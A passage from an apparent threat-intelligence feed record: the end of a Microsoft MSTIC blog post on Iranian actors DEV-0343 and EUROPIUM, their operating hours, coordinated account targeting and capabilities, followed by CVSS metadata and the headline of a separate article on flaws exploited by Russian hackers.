companies with a business focus in the Middle East.\n\nAs we discussed in our previous blog, DEV-0343 operators\u2019 \u2018pattern of life\u2019 is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.\n\n\n\n_Figure 2: DEV-0343 observed operating hours in UTC_\n\n\n\n_Figure 3: DEV-0343 observed actor requests per day_\n\nKnown DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.\n\n## Closing thoughts: Increasingly capable threat actors\n\nAs Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, Iranian operators have proven themselves to be both willing and able to:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\nMSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-16T16:00:08", "type": "mssecure", &qu
Top 12 Security Flaws Russian Spy Hackers Are Exploiting in the Wild
